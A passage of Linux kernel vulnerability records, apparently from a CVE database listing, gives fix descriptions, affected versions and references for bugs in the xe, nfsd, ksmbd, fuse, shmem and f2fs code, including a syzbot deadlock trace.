added\nreturn value handling]"
}
],
"providerMetadata": {
"dateUpdated": "2026-01-14T08:51:41.877Z",
"orgId": "416baaa9-dc9f-4396-8d5f-8c081fb06d67",
"shortName": "Linux"
},
"references": [
{
"url": "https://git.kernel.org/stable/c/44a38eb4f7876513db5a1bccde74de9bc4389d43"
},
{
"url": "https://git.kernel.org/stable/c/4fff9a625da958a33191c8553a03283786f9f417"
},
{
"url": "https://git.kernel.org/stable/c/b3c151fe8f543f1a0b8b5df16ce5d97afa5ec85a"
},
{
"url": "https://git.kernel.org/stable/c/d1693a7d5a38acf6424235a6070bcf5b186a360d"
}
],
"title": "ntfs: set dummy blocksize to read boot_block when mounting",
"x_generator": {
"engine": "bippy-1.2.0"
}
}
},
"cveMetadata": {
"assignerOrgId": "416baaa9-dc9f-4396-8d5f-8c081fb06d67",
"assignerShortName": "Linux",
"cveId": "CVE-2025-71067",
"datePublished": "2026-01-13T15:31:22.585Z",
"dateReserved": "2026-01-13T15:30:19.647Z",
"dateUpdated": "2026-01-14T08:51:41.877Z",
"state": "PUBLISHED"
},
"dataType": "CVE_RECORD",
"dataVersion": "5.2"
}
CVE-2025-71099 (GCVE-0-2025-71099)
Vulnerability from cvelistv5 – Published: 2026-01-13 15:34 – Updated: 2026-01-13 15:34
VLAI?
EPSS
Title
drm/xe/oa: Fix potential UAF in xe_oa_add_config_ioctl()
Summary
In the Linux kernel, the following vulnerability has been resolved:
drm/xe/oa: Fix potential UAF in xe_oa_add_config_ioctl()
In xe_oa_add_config_ioctl(), we accessed oa_config->id after dropping
metrics_lock. Since this lock protects the lifetime of oa_config, an
attacker could guess the id and call xe_oa_remove_config_ioctl() with
perfect timing, freeing oa_config before we dereference it, leading to
a potential use-after-free.
Fix this by caching the id in a local variable while holding the lock.
v2: (Matt A)
- Dropped mutex_unlock(&oa->metrics_lock) ordering change from
xe_oa_remove_config_ioctl()
(cherry picked from commit 28aeaed130e8e587fd1b73b6d66ca41ccc5a1a31)
Severity ?
No CVSS data available.
Assigner
References
Impacted products
| Vendor | Product | Version | ||
|---|---|---|---|---|
| Linux | Linux |
Affected:
cdf02fe1a94a768cbcd20f5c4e1a1d805f4a06c0 , < c6d30b65b7a44dac52ad49513268adbf19eab4a2
(git)
Affected: cdf02fe1a94a768cbcd20f5c4e1a1d805f4a06c0 , < 7cdb9a9da935c687563cc682155461fef5f9b48d (git) Affected: cdf02fe1a94a768cbcd20f5c4e1a1d805f4a06c0 , < dcb171931954c51a1a7250d558f02b8f36570783 (git) |
||
{
"containers": {
"cna": {
"affected": [
{
"defaultStatus": "unaffected",
"product": "Linux",
"programFiles": [
"drivers/gpu/drm/xe/xe_oa.c"
],
"repo": "https://git.kernel.org/pub/scm/linux/kernel/git/stable/linux.git",
"vendor": "Linux",
"versions": [
{
"lessThan": "c6d30b65b7a44dac52ad49513268adbf19eab4a2",
"status": "affected",
"version": "cdf02fe1a94a768cbcd20f5c4e1a1d805f4a06c0",
"versionType": "git"
},
{
"lessThan": "7cdb9a9da935c687563cc682155461fef5f9b48d",
"status": "affected",
"version": "cdf02fe1a94a768cbcd20f5c4e1a1d805f4a06c0",
"versionType": "git"
},
{
"lessThan": "dcb171931954c51a1a7250d558f02b8f36570783",
"status": "affected",
"version": "cdf02fe1a94a768cbcd20f5c4e1a1d805f4a06c0",
"versionType": "git"
}
]
},
{
"defaultStatus": "affected",
"product": "Linux",
"programFiles": [
"drivers/gpu/drm/xe/xe_oa.c"
],
"repo": "https://git.kernel.org/pub/scm/linux/kernel/git/stable/linux.git",
"vendor": "Linux",
"versions": [
{
"status": "affected",
"version": "6.11"
},
{
"lessThan": "6.11",
"status": "unaffected",
"version": "0",
"versionType": "semver"
},
{
"lessThanOrEqual": "6.12.*",
"status": "unaffected",
"version": "6.12.64",
"versionType": "semver"
},
{
"lessThanOrEqual": "6.18.*",
"status": "unaffected",
"version": "6.18.4",
"versionType": "semver"
},
{
"lessThanOrEqual": "*",
"status": "unaffected",
"version": "6.19-rc1",
"versionType": "original_commit_for_fix"
}
]
}
],
"cpeApplicability": [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.12.64",
"versionStartIncluding": "6.11",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.18.4",
"versionStartIncluding": "6.11",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.19-rc1",
"versionStartIncluding": "6.11",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
}
]
}
],
"descriptions": [
{
"lang": "en",
"value": "In the Linux kernel, the following vulnerability has been resolved:\n\ndrm/xe/oa: Fix potential UAF in xe_oa_add_config_ioctl()\n\nIn xe_oa_add_config_ioctl(), we accessed oa_config-\u003eid after dropping\nmetrics_lock. Since this lock protects the lifetime of oa_config, an\nattacker could guess the id and call xe_oa_remove_config_ioctl() with\nperfect timing, freeing oa_config before we dereference it, leading to\na potential use-after-free.\n\nFix this by caching the id in a local variable while holding the lock.\n\nv2: (Matt A)\n- Dropped mutex_unlock(\u0026oa-\u003emetrics_lock) ordering change from\n xe_oa_remove_config_ioctl()\n\n(cherry picked from commit 28aeaed130e8e587fd1b73b6d66ca41ccc5a1a31)"
}
],
"providerMetadata": {
"dateUpdated": "2026-01-13T15:34:58.359Z",
"orgId": "416baaa9-dc9f-4396-8d5f-8c081fb06d67",
"shortName": "Linux"
},
"references": [
{
"url": "https://git.kernel.org/stable/c/c6d30b65b7a44dac52ad49513268adbf19eab4a2"
},
{
"url": "https://git.kernel.org/stable/c/7cdb9a9da935c687563cc682155461fef5f9b48d"
},
{
"url": "https://git.kernel.org/stable/c/dcb171931954c51a1a7250d558f02b8f36570783"
}
],
"title": "drm/xe/oa: Fix potential UAF in xe_oa_add_config_ioctl()",
"x_generator": {
"engine": "bippy-1.2.0"
}
}
},
"cveMetadata": {
"assignerOrgId": "416baaa9-dc9f-4396-8d5f-8c081fb06d67",
"assignerShortName": "Linux",
"cveId": "CVE-2025-71099",
"datePublished": "2026-01-13T15:34:58.359Z",
"dateReserved": "2026-01-13T15:30:19.650Z",
"dateUpdated": "2026-01-13T15:34:58.359Z",
"state": "PUBLISHED"
},
"dataType": "CVE_RECORD",
"dataVersion": "5.2"
}
CVE-2025-71090 (GCVE-0-2025-71090)
Vulnerability from cvelistv5 – Published: 2026-01-13 15:34 – Updated: 2026-01-13 15:34
VLAI?
EPSS
Title
nfsd: fix nfsd_file reference leak in nfsd4_add_rdaccess_to_wrdeleg()
Summary
In the Linux kernel, the following vulnerability has been resolved:
nfsd: fix nfsd_file reference leak in nfsd4_add_rdaccess_to_wrdeleg()
nfsd4_add_rdaccess_to_wrdeleg() unconditionally overwrites
fp->fi_fds[O_RDONLY] with a newly acquired nfsd_file. However, if
the client already has a SHARE_ACCESS_READ open from a previous OPEN
operation, this action overwrites the existing pointer without
releasing its reference, orphaning the previous reference.
Additionally, the function originally stored the same nfsd_file
pointer in both fp->fi_fds[O_RDONLY] and fp->fi_rdeleg_file with
only a single reference. When put_deleg_file() runs, it clears
fi_rdeleg_file and calls nfs4_file_put_access() to release the file.
However, nfs4_file_put_access() only releases fi_fds[O_RDONLY] when
the fi_access[O_RDONLY] counter drops to zero. If another READ open
exists on the file, the counter remains elevated and the nfsd_file
reference from the delegation is never released. This potentially
causes open conflicts on that file.
Then, on server shutdown, these leaks cause __nfsd_file_cache_purge()
to encounter files with an elevated reference count that cannot be
cleaned up, ultimately triggering a BUG() in kmem_cache_destroy()
because there are still nfsd_file objects allocated in that cache.
Severity ?
No CVSS data available.
Assigner
References
Impacted products
{
"containers": {
"cna": {
"affected": [
{
"defaultStatus": "unaffected",
"product": "Linux",
"programFiles": [
"fs/nfsd/nfs4state.c"
],
"repo": "https://git.kernel.org/pub/scm/linux/kernel/git/stable/linux.git",
"vendor": "Linux",
"versions": [
{
"lessThan": "c07dc84ed67c5a182273171639bacbbb87c12175",
"status": "affected",
"version": "e7a8ebc305f26cab608e59a916a4ae89d6656c5f",
"versionType": "git"
},
{
"lessThan": "8072e34e1387d03102b788677d491e2bcceef6f5",
"status": "affected",
"version": "e7a8ebc305f26cab608e59a916a4ae89d6656c5f",
"versionType": "git"
}
]
},
{
"defaultStatus": "affected",
"product": "Linux",
"programFiles": [
"fs/nfsd/nfs4state.c"
],
"repo": "https://git.kernel.org/pub/scm/linux/kernel/git/stable/linux.git",
"vendor": "Linux",
"versions": [
{
"status": "affected",
"version": "6.17"
},
{
"lessThan": "6.17",
"status": "unaffected",
"version": "0",
"versionType": "semver"
},
{
"lessThanOrEqual": "6.18.*",
"status": "unaffected",
"version": "6.18.4",
"versionType": "semver"
},
{
"lessThanOrEqual": "*",
"status": "unaffected",
"version": "6.19-rc4",
"versionType": "original_commit_for_fix"
}
]
}
],
"cpeApplicability": [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.18.4",
"versionStartIncluding": "6.17",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.19-rc4",
"versionStartIncluding": "6.17",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
}
]
}
],
"descriptions": [
{
"lang": "en",
"value": "In the Linux kernel, the following vulnerability has been resolved:\n\nnfsd: fix nfsd_file reference leak in nfsd4_add_rdaccess_to_wrdeleg()\n\nnfsd4_add_rdaccess_to_wrdeleg() unconditionally overwrites\nfp-\u003efi_fds[O_RDONLY] with a newly acquired nfsd_file. However, if\nthe client already has a SHARE_ACCESS_READ open from a previous OPEN\noperation, this action overwrites the existing pointer without\nreleasing its reference, orphaning the previous reference.\n\nAdditionally, the function originally stored the same nfsd_file\npointer in both fp-\u003efi_fds[O_RDONLY] and fp-\u003efi_rdeleg_file with\nonly a single reference. When put_deleg_file() runs, it clears\nfi_rdeleg_file and calls nfs4_file_put_access() to release the file.\n\nHowever, nfs4_file_put_access() only releases fi_fds[O_RDONLY] when\nthe fi_access[O_RDONLY] counter drops to zero. If another READ open\nexists on the file, the counter remains elevated and the nfsd_file\nreference from the delegation is never released. This potentially\ncauses open conflicts on that file.\n\nThen, on server shutdown, these leaks cause __nfsd_file_cache_purge()\nto encounter files with an elevated reference count that cannot be\ncleaned up, ultimately triggering a BUG() in kmem_cache_destroy()\nbecause there are still nfsd_file objects allocated in that cache."
}
],
"providerMetadata": {
"dateUpdated": "2026-01-13T15:34:51.777Z",
"orgId": "416baaa9-dc9f-4396-8d5f-8c081fb06d67",
"shortName": "Linux"
},
"references": [
{
"url": "https://git.kernel.org/stable/c/c07dc84ed67c5a182273171639bacbbb87c12175"
},
{
"url": "https://git.kernel.org/stable/c/8072e34e1387d03102b788677d491e2bcceef6f5"
}
],
"title": "nfsd: fix nfsd_file reference leak in nfsd4_add_rdaccess_to_wrdeleg()",
"x_generator": {
"engine": "bippy-1.2.0"
}
}
},
"cveMetadata": {
"assignerOrgId": "416baaa9-dc9f-4396-8d5f-8c081fb06d67",
"assignerShortName": "Linux",
"cveId": "CVE-2025-71090",
"datePublished": "2026-01-13T15:34:51.777Z",
"dateReserved": "2026-01-13T15:30:19.649Z",
"dateUpdated": "2026-01-13T15:34:51.777Z",
"state": "PUBLISHED"
},
"dataType": "CVE_RECORD",
"dataVersion": "5.2"
}
CVE-2025-68806 (GCVE-0-2025-68806)
Vulnerability from cvelistv5 – Published: 2026-01-13 15:29 – Updated: 2026-01-14 08:51
VLAI?
EPSS
Title
ksmbd: fix buffer validation by including null terminator size in EA length
Summary
In the Linux kernel, the following vulnerability has been resolved:
ksmbd: fix buffer validation by including null terminator size in EA length
The smb2_set_ea function, which handles Extended Attributes (EA),
was performing buffer validation checks that incorrectly omitted the size
of the null terminating character (+1 byte) for EA Name.
This patch fixes the issue by explicitly adding '+ 1' to EaNameLength where
the null terminator is expected to be present in the buffer, ensuring
the validation accurately reflects the total required buffer size.
Severity ?
No CVSS data available.
Assigner
References
Impacted products
| Vendor | Product | Version | ||
|---|---|---|---|---|
| Linux | Linux |
Affected:
d070c4dd2a5bed4e9832eec5b6c029c7d14892ea , < cae52c592a07e1d3fa3338a5f064a374a5f26750
(git)
Affected: 0ba5439d9afa2722e7728df56f272c89987540a4 , < a28a375a5439eb474e9f284509a407efb479c925 (git) Affected: 0ba5439d9afa2722e7728df56f272c89987540a4 , < d26af6d14da43ab92d07bc60437c62901dc522e6 (git) Affected: 0ba5439d9afa2722e7728df56f272c89987540a4 , < 6dc8cf6e7998ef7aeb9383a4c2904ea5d22fa2e4 (git) Affected: 0ba5439d9afa2722e7728df56f272c89987540a4 , < 95d7a890e4b03e198836d49d699408fd1867cb55 (git) Affected: bb5bf157b5be1643cccc7cbbe57fcdef9ae52c2c (git) Affected: 1a13ecb96230e8b7b91967e292836f7b01ec8111 (git) Affected: 404e7c01e16288b5e0171d1d8fd3328e806d0794 (git) |
||
{
"containers": {
"cna": {
"affected": [
{
"defaultStatus": "unaffected",
"product": "Linux",
"programFiles": [
"fs/smb/server/smb2pdu.c"
],
"repo": "https://git.kernel.org/pub/scm/linux/kernel/git/stable/linux.git",
"vendor": "Linux",
"versions": [
{
"lessThan": "cae52c592a07e1d3fa3338a5f064a374a5f26750",
"status": "affected",
"version": "d070c4dd2a5bed4e9832eec5b6c029c7d14892ea",
"versionType": "git"
},
{
"lessThan": "a28a375a5439eb474e9f284509a407efb479c925",
"status": "affected",
"version": "0ba5439d9afa2722e7728df56f272c89987540a4",
"versionType": "git"
},
{
"lessThan": "d26af6d14da43ab92d07bc60437c62901dc522e6",
"status": "affected",
"version": "0ba5439d9afa2722e7728df56f272c89987540a4",
"versionType": "git"
},
{
"lessThan": "6dc8cf6e7998ef7aeb9383a4c2904ea5d22fa2e4",
"status": "affected",
"version": "0ba5439d9afa2722e7728df56f272c89987540a4",
"versionType": "git"
},
{
"lessThan": "95d7a890e4b03e198836d49d699408fd1867cb55",
"status": "affected",
"version": "0ba5439d9afa2722e7728df56f272c89987540a4",
"versionType": "git"
},
{
"status": "affected",
"version": "bb5bf157b5be1643cccc7cbbe57fcdef9ae52c2c",
"versionType": "git"
},
{
"status": "affected",
"version": "1a13ecb96230e8b7b91967e292836f7b01ec8111",
"versionType": "git"
},
{
"status": "affected",
"version": "404e7c01e16288b5e0171d1d8fd3328e806d0794",
"versionType": "git"
}
]
},
{
"defaultStatus": "affected",
"product": "Linux",
"programFiles": [
"fs/smb/server/smb2pdu.c"
],
"repo": "https://git.kernel.org/pub/scm/linux/kernel/git/stable/linux.git",
"vendor": "Linux",
"versions": [
{
"status": "affected",
"version": "6.6"
},
{
"lessThan": "6.6",
"status": "unaffected",
"version": "0",
"versionType": "semver"
},
{
"lessThanOrEqual": "6.1.*",
"status": "unaffected",
"version": "6.1.160",
"versionType": "semver"
},
{
"lessThanOrEqual": "6.6.*",
"status": "unaffected",
"version": "6.6.120",
"versionType": "semver"
},
{
"lessThanOrEqual": "6.12.*",
"status": "unaffected",
"version": "6.12.64",
"versionType": "semver"
},
{
"lessThanOrEqual": "6.18.*",
"status": "unaffected",
"version": "6.18.3",
"versionType": "semver"
},
{
"lessThanOrEqual": "*",
"status": "unaffected",
"version": "6.19-rc2",
"versionType": "original_commit_for_fix"
}
]
}
],
"cpeApplicability": [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.1.160",
"versionStartIncluding": "6.1.52",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.6.120",
"versionStartIncluding": "6.6",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.12.64",
"versionStartIncluding": "6.6",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.18.3",
"versionStartIncluding": "6.6",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.19-rc2",
"versionStartIncluding": "6.6",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionStartIncluding": "5.15.131",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionStartIncluding": "6.4.15",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionStartIncluding": "6.5.2",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
}
]
}
],
"descriptions": [
{
"lang": "en",
"value": "In the Linux kernel, the following vulnerability has been resolved:\n\nksmbd: fix buffer validation by including null terminator size in EA length\n\nThe smb2_set_ea function, which handles Extended Attributes (EA),\nwas performing buffer validation checks that incorrectly omitted the size\nof the null terminating character (+1 byte) for EA Name.\nThis patch fixes the issue by explicitly adding \u0027+ 1\u0027 to EaNameLength where\nthe null terminator is expected to be present in the buffer, ensuring\nthe validation accurately reflects the total required buffer size."
}
],
"providerMetadata": {
"dateUpdated": "2026-01-14T08:51:38.039Z",
"orgId": "416baaa9-dc9f-4396-8d5f-8c081fb06d67",
"shortName": "Linux"
},
"references": [
{
"url": "https://git.kernel.org/stable/c/cae52c592a07e1d3fa3338a5f064a374a5f26750"
},
{
"url": "https://git.kernel.org/stable/c/a28a375a5439eb474e9f284509a407efb479c925"
},
{
"url": "https://git.kernel.org/stable/c/d26af6d14da43ab92d07bc60437c62901dc522e6"
},
{
"url": "https://git.kernel.org/stable/c/6dc8cf6e7998ef7aeb9383a4c2904ea5d22fa2e4"
},
{
"url": "https://git.kernel.org/stable/c/95d7a890e4b03e198836d49d699408fd1867cb55"
}
],
"title": "ksmbd: fix buffer validation by including null terminator size in EA length",
"x_generator": {
"engine": "bippy-1.2.0"
}
}
},
"cveMetadata": {
"assignerOrgId": "416baaa9-dc9f-4396-8d5f-8c081fb06d67",
"assignerShortName": "Linux",
"cveId": "CVE-2025-68806",
"datePublished": "2026-01-13T15:29:13.797Z",
"dateReserved": "2025-12-24T10:30:51.045Z",
"dateUpdated": "2026-01-14T08:51:38.039Z",
"state": "PUBLISHED"
},
"dataType": "CVE_RECORD",
"dataVersion": "5.2"
}
CVE-2025-68791 (GCVE-0-2025-68791)
Vulnerability from cvelistv5 – Published: 2026-01-13 15:29 – Updated: 2026-01-13 15:29
VLAI?
EPSS
Title
fuse: missing copy_finish in fuse-over-io-uring argument copies
Summary
In the Linux kernel, the following vulnerability has been resolved:
fuse: missing copy_finish in fuse-over-io-uring argument copies
Fix a possible reference count leak of payload pages during
fuse argument copies.
[Joanne: simplified error cleanup]
Severity ?
No CVSS data available.
Assigner
References
Impacted products
{
"containers": {
"cna": {
"affected": [
{
"defaultStatus": "unaffected",
"product": "Linux",
"programFiles": [
"fs/fuse/dev.c",
"fs/fuse/dev_uring.c",
"fs/fuse/fuse_dev_i.h"
],
"repo": "https://git.kernel.org/pub/scm/linux/kernel/git/stable/linux.git",
"vendor": "Linux",
"versions": [
{
"lessThan": "b79938863f436960eff209130f025c4bd3026bf8",
"status": "affected",
"version": "c090c8abae4b6b77a1bee116aa6c385456ebef96",
"versionType": "git"
},
{
"lessThan": "6e0d7f7f4a43ac8868e98c87ecf48805aa8c24dd",
"status": "affected",
"version": "c090c8abae4b6b77a1bee116aa6c385456ebef96",
"versionType": "git"
}
]
},
{
"defaultStatus": "affected",
"product": "Linux",
"programFiles": [
"fs/fuse/dev.c",
"fs/fuse/dev_uring.c",
"fs/fuse/fuse_dev_i.h"
],
"repo": "https://git.kernel.org/pub/scm/linux/kernel/git/stable/linux.git",
"vendor": "Linux",
"versions": [
{
"status": "affected",
"version": "6.14"
},
{
"lessThan": "6.14",
"status": "unaffected",
"version": "0",
"versionType": "semver"
},
{
"lessThanOrEqual": "6.18.*",
"status": "unaffected",
"version": "6.18.3",
"versionType": "semver"
},
{
"lessThanOrEqual": "*",
"status": "unaffected",
"version": "6.19-rc1",
"versionType": "original_commit_for_fix"
}
]
}
],
"cpeApplicability": [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.18.3",
"versionStartIncluding": "6.14",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.19-rc1",
"versionStartIncluding": "6.14",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
}
]
}
],
"descriptions": [
{
"lang": "en",
"value": "In the Linux kernel, the following vulnerability has been resolved:\n\nfuse: missing copy_finish in fuse-over-io-uring argument copies\n\nFix a possible reference count leak of payload pages during\nfuse argument copies.\n\n[Joanne: simplified error cleanup]"
}
],
"providerMetadata": {
"dateUpdated": "2026-01-13T15:29:03.553Z",
"orgId": "416baaa9-dc9f-4396-8d5f-8c081fb06d67",
"shortName": "Linux"
},
"references": [
{
"url": "https://git.kernel.org/stable/c/b79938863f436960eff209130f025c4bd3026bf8"
},
{
"url": "https://git.kernel.org/stable/c/6e0d7f7f4a43ac8868e98c87ecf48805aa8c24dd"
}
],
"title": "fuse: missing copy_finish in fuse-over-io-uring argument copies",
"x_generator": {
"engine": "bippy-1.2.0"
}
}
},
"cveMetadata": {
"assignerOrgId": "416baaa9-dc9f-4396-8d5f-8c081fb06d67",
"assignerShortName": "Linux",
"cveId": "CVE-2025-68791",
"datePublished": "2026-01-13T15:29:03.553Z",
"dateReserved": "2025-12-24T10:30:51.037Z",
"dateUpdated": "2026-01-13T15:29:03.553Z",
"state": "PUBLISHED"
},
"dataType": "CVE_RECORD",
"dataVersion": "5.2"
}
CVE-2025-71072 (GCVE-0-2025-71072)
Vulnerability from cvelistv5 – Published: 2026-01-13 15:31 – Updated: 2026-01-13 15:31
VLAI?
EPSS
Title
shmem: fix recovery on rename failures
Summary
In the Linux kernel, the following vulnerability has been resolved:
shmem: fix recovery on rename failures
maple_tree insertions can fail if we are seriously short on memory;
simple_offset_rename() does not recover well if it runs into that.
The same goes for simple_offset_rename_exchange().
Moreover, shmem_whiteout() expects that if it succeeds, the caller will
progress to d_move(), i.e. that shmem_rename2() won't fail past the
successful call of shmem_whiteout().
Not hard to fix, fortunately - mtree_store() can't fail if the index we
are trying to store into is already present in the tree as a singleton.
For simple_offset_rename_exchange() that's enough - we just need to be
careful about the order of operations.
For simple_offset_rename() solution is to preinsert the target into the
tree for new_dir; the rest can be done without any potentially failing
operations.
That preinsertion has to be done in shmem_rename2() rather than in
simple_offset_rename() itself - otherwise we'd need to deal with the
possibility of failure after successful shmem_whiteout().
Severity ?
No CVSS data available.
Assigner
References
Impacted products
| Vendor | Product | Version | ||
|---|---|---|---|---|
| Linux | Linux |
Affected:
a2e459555c5f9da3e619b7e47a63f98574dc75f1 , < 4b0fe71fb3965d0db83cdfc2f4fe0b3227d70113
(git)
Affected: a2e459555c5f9da3e619b7e47a63f98574dc75f1 , < 4642686699a46718d7f2fb5acd1e9d866a9d9cca (git) Affected: a2e459555c5f9da3e619b7e47a63f98574dc75f1 , < e1b4c6a58304fd490124cc2b454d80edc786665c (git) |
||
{
"containers": {
"cna": {
"affected": [
{
"defaultStatus": "unaffected",
"product": "Linux",
"programFiles": [
"fs/libfs.c",
"include/linux/fs.h",
"mm/shmem.c"
],
"repo": "https://git.kernel.org/pub/scm/linux/kernel/git/stable/linux.git",
"vendor": "Linux",
"versions": [
{
"lessThan": "4b0fe71fb3965d0db83cdfc2f4fe0b3227d70113",
"status": "affected",
"version": "a2e459555c5f9da3e619b7e47a63f98574dc75f1",
"versionType": "git"
},
{
"lessThan": "4642686699a46718d7f2fb5acd1e9d866a9d9cca",
"status": "affected",
"version": "a2e459555c5f9da3e619b7e47a63f98574dc75f1",
"versionType": "git"
},
{
"lessThan": "e1b4c6a58304fd490124cc2b454d80edc786665c",
"status": "affected",
"version": "a2e459555c5f9da3e619b7e47a63f98574dc75f1",
"versionType": "git"
}
]
},
{
"defaultStatus": "affected",
"product": "Linux",
"programFiles": [
"fs/libfs.c",
"include/linux/fs.h",
"mm/shmem.c"
],
"repo": "https://git.kernel.org/pub/scm/linux/kernel/git/stable/linux.git",
"vendor": "Linux",
"versions": [
{
"status": "affected",
"version": "6.6"
},
{
"lessThan": "6.6",
"status": "unaffected",
"version": "0",
"versionType": "semver"
},
{
"lessThanOrEqual": "6.12.*",
"status": "unaffected",
"version": "6.12.64",
"versionType": "semver"
},
{
"lessThanOrEqual": "6.18.*",
"status": "unaffected",
"version": "6.18.3",
"versionType": "semver"
},
{
"lessThanOrEqual": "*",
"status": "unaffected",
"version": "6.19-rc2",
"versionType": "original_commit_for_fix"
}
]
}
],
"cpeApplicability": [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.12.64",
"versionStartIncluding": "6.6",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.18.3",
"versionStartIncluding": "6.6",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.19-rc2",
"versionStartIncluding": "6.6",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
}
]
}
],
"descriptions": [
{
"lang": "en",
"value": "In the Linux kernel, the following vulnerability has been resolved:\n\nshmem: fix recovery on rename failures\n\nmaple_tree insertions can fail if we are seriously short on memory;\nsimple_offset_rename() does not recover well if it runs into that.\nThe same goes for simple_offset_rename_exchange().\n\nMoreover, shmem_whiteout() expects that if it succeeds, the caller will\nprogress to d_move(), i.e. that shmem_rename2() won\u0027t fail past the\nsuccessful call of shmem_whiteout().\n\nNot hard to fix, fortunately - mtree_store() can\u0027t fail if the index we\nare trying to store into is already present in the tree as a singleton.\n\nFor simple_offset_rename_exchange() that\u0027s enough - we just need to be\ncareful about the order of operations.\n\nFor simple_offset_rename() solution is to preinsert the target into the\ntree for new_dir; the rest can be done without any potentially failing\noperations.\n\nThat preinsertion has to be done in shmem_rename2() rather than in\nsimple_offset_rename() itself - otherwise we\u0027d need to deal with the\npossibility of failure after successful shmem_whiteout()."
}
],
"providerMetadata": {
"dateUpdated": "2026-01-13T15:31:26.089Z",
"orgId": "416baaa9-dc9f-4396-8d5f-8c081fb06d67",
"shortName": "Linux"
},
"references": [
{
"url": "https://git.kernel.org/stable/c/4b0fe71fb3965d0db83cdfc2f4fe0b3227d70113"
},
{
"url": "https://git.kernel.org/stable/c/4642686699a46718d7f2fb5acd1e9d866a9d9cca"
},
{
"url": "https://git.kernel.org/stable/c/e1b4c6a58304fd490124cc2b454d80edc786665c"
}
],
"title": "shmem: fix recovery on rename failures",
"x_generator": {
"engine": "bippy-1.2.0"
}
}
},
"cveMetadata": {
"assignerOrgId": "416baaa9-dc9f-4396-8d5f-8c081fb06d67",
"assignerShortName": "Linux",
"cveId": "CVE-2025-71072",
"datePublished": "2026-01-13T15:31:26.089Z",
"dateReserved": "2026-01-13T15:30:19.647Z",
"dateUpdated": "2026-01-13T15:31:26.089Z",
"state": "PUBLISHED"
},
"dataType": "CVE_RECORD",
"dataVersion": "5.2"
}
CVE-2025-71065 (GCVE-0-2025-71065)
Vulnerability from cvelistv5 – Published: 2026-01-13 15:31 – Updated: 2026-01-13 15:31
VLAI?
EPSS
Title
f2fs: fix to avoid potential deadlock
Summary
In the Linux kernel, the following vulnerability has been resolved:
f2fs: fix to avoid potential deadlock
As Jiaming Zhang and syzbot reported, there is potential deadlock in
f2fs as below:
Chain exists of:
&sbi->cp_rwsem --> fs_reclaim --> sb_internal#2
Possible unsafe locking scenario:
CPU0 CPU1
---- ----
rlock(sb_internal#2);
lock(fs_reclaim);
lock(sb_internal#2);
rlock(&sbi->cp_rwsem);
*** DEADLOCK ***
3 locks held by kswapd0/73:
#0: ffffffff8e247a40 (fs_reclaim){+.+.}-{0:0}, at: balance_pgdat mm/vmscan.c:7015 [inline]
#0: ffffffff8e247a40 (fs_reclaim){+.+.}-{0:0}, at: kswapd+0x951/0x2800 mm/vmscan.c:7389
#1: ffff8880118400e0 (&type->s_umount_key#50){.+.+}-{4:4}, at: super_trylock_shared fs/super.c:562 [inline]
#1: ffff8880118400e0 (&type->s_umount_key#50){.+.+}-{4:4}, at: super_cache_scan+0x91/0x4b0 fs/super.c:197
#2: ffff888011840610 (sb_internal#2){.+.+}-{0:0}, at: f2fs_evict_inode+0x8d9/0x1b60 fs/f2fs/inode.c:890
stack backtrace:
CPU: 0 UID: 0 PID: 73 Comm: kswapd0 Not tainted syzkaller #0 PREEMPT(full)
Hardware name: QEMU Standard PC (Q35 + ICH9, 2009), BIOS 1.16.3-debian-1.16.3-2~bpo12+1 04/01/2014
Call Trace:
<TASK>
dump_stack_lvl+0x189/0x250 lib/dump_stack.c:120
print_circular_bug+0x2ee/0x310 kernel/locking/lockdep.c:2043
check_noncircular+0x134/0x160 kernel/locking/lockdep.c:2175
check_prev_add kernel/locking/lockdep.c:3165 [inline]
check_prevs_add kernel/locking/lockdep.c:3284 [inline]
validate_chain+0xb9b/0x2140 kernel/locking/lockdep.c:3908
__lock_acquire+0xab9/0xd20 kernel/locking/lockdep.c:5237
